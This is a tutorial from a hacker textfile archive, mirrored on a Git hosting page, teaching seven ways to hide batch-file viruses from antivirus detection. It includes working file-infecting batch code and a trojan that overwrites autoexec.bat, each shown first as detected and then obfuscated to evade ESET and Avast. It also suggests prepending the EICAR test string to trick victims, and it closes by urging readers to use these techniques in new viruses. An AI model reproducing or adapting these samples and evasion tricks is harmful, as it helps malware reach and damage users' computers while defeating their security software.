informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/uploads/antiavtech.txt

246 lines
12 KiB
Plaintext
Raw Blame History

@*$%$#X5O!P%@AP[4\PZX54(P^)7CC)7}$
$ 0
@ TUTORIAL: #
U ^
) Anti AV Techniques For Batch $
* f
R by *
! 0
2 cOrRuPt G3n3t!x #
& %
*$%$#X5O!P%@AP[4\PZX54(P^)7CC)7}$%
In order to make our batch file virus a little more inconspicuos, unreadable or undetectable
we use batch encryption techniques to fool AV's and people trying read or decypher our code.
There are many different ways and today i'll explain all the possible ways i know for batch
encryption and AV & AV heuristics fooling. I used ESET NOD32 Anti-Virus for its great herustics
capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques
have been tested on Windows Vista and work!
1)EICAR Test File:
----------------
AV companies needed a way to test whether their product works on the users computer but
without bringing harm to it, so EICAR was born, a universal string of code that will set off
all AV's but will display 'EICAR TEST FILE NOT A VIRUS' or something similar, so we therefore,
add this string to the begining of our code in hopes that the user will let it run after seeing that
its a test file and not a virus. This will help when infecting people with limited knowlegde on viruses
so definitely not a great technique when compared to others but non the less, here's the string for the
EICAR 'Virus' which should be added to the beginning of your code:
-------------------------------[Cut Here]--------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
-------------------------------[Cut Here]--------------------------------------
2)Fake Bytes:
-----------
All AV's will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do?
We add a whole bunch of letters in the first 1000 bytes of our code, pretty easy and an excellent
way to bypass scanners and in some cases AV heurstics. So here is exactly a 1000 bytes of useless code
which should be pasted at the beginning of your code:
-------------------------------[Cut Here]--------------------------------------
jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr
djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf
fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk
fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg
fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh
hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui
dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd
dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng
fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv
dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu
-------------------------------[Cut Here]--------------------------------------
3)Standard Encryption Technique (SET):
-----------------------------------
As the acronym would suggest this is a technique whereby the 'set' command in MS-DOS is used
to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret.
we do this by assigning a variable to a set command, this might not make sense but see below:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
for %%a in (*.bat) do copy %0 %%a
-------------------------------[Cut Here]--------------------------------------
Now by encrypting vairbles: for, in, do and copy it will become undetected. Although it was not
detected by encrypting only one of the variables this will not always be the case.
This was not detected by ESET NOD32 or Avast4:
-------------------------------[Cut Here]--------------------------------------
set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a
-------------------------------[Cut Here]--------------------------------------
This will be compilcated for others to read but not for people with a knowledge of batch so what
you could do is make the set encryption appear at the bottom of your code and then begin to read the top,
this will work well with large code as the user will have to scroll down to see the set encryption. You
can do this simply by having a 'GOTO' command that will goto the decryption parameter before returning
to the encrypted code, using more then one variable will make it much harder to read! See below:
-------------------------------[Cut Here]--------------------------------------
@echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect
-------------------------------[Cut Here]--------------------------------------
4)Character Overflow:
-------------------
Fisrt off thanks to DvL for this idea and now lets begin. This is just an awesome name i gave to
a Anti AV technique that will help by hiding your lines and fool the AV from detecting the right tokens
in your batch. All you need to do is add characters betwee each line of your code, it can also be numbers
I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun.
The only snag is the virus has to have more then 3 or 4 lines to work effectively.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32
-------------------------------[Cut Here]--------------------------------------
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
-------------------------------[Cut Here]--------------------------------------
When using the Character Overflow technique it was not detected by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
-------------------------------[Cut Here]--------------------------------------
5)GOTO Confuser:
--------------
This is a bit impractical as it takes extremely long and is pretty confusing depending on the size of your code.
It only works with code that is longer then 5 lines. What it does is confuse the AV by giving
multiple goto commands so the strings of the virus is seperate and not read as a single token so it wont be detected.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
-------------------------------[Cut Here]--------------------------------------
Using the GOTO confuser it was not detected by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
:a
goto f
:b
goto l
:c
goto m
:d
goto r
-------------------------------[Cut Here]--------------------------------------
6)Trash Code:
-----------
This refers to lines of code that simply do nothing, but as far as the AV is concerned its working code
so wat do we do with this in mind? We put meaningless garbage between our actual code, it is however
important to note that the lines you are using for trash code is not used for anything:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
-------------------------------[Cut Here]--------------------------------------
for %%a in (*.bat) do copy %0 %%a
-------------------------------[Cut Here]--------------------------------------
When using garbage or trash code it was not detected:
-------------------------------[Cut Here]--------------------------------------
set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
-------------------------------[Cut Here]--------------------------------------
In the first line we made sure trash was set to nothing then added the code to the virus it worked
perfectly without being detected!
7)Fake SET technique:
------------------
Although our Standard Encryption technique is strong enough for heuristics and AV's this technique will make it
much harder to be found and also to be debugged. This technique involves the "set %variable%=%command" except
we shall give the variables fake commands and then set the real commands see below for more clarity:
-------------------------------[Cut Here]--------------------------------------
set acv=ren
set acv=for
set acv=copy
set axv=yes
set axv=for
set lmno=ggg
set lmno=in
%axv% %%a %lmno% (*.bat) do %acv% %0 %%a
-------------------------------[Cut Here]--------------------------------------
as you can see we renamed the vairble a few times which begins to get tricky especially when
the code is long! No AV will detect this as it has no set string, and it will give heuristics
a hard time to emulate the code!
I Hope to see you using some of these techniques in up and coming batch file virii! If there is any problems with my code
or you have a question just e-mail me and i'll gladly help. Remember this is for educational purposes only do not use
maliciously! KEEP On Batching... :)
[?]Contact Me:
-----------
[@]immortalassassin@rocketmail.com
Reference in New Issue View Git Blame Copy Permalink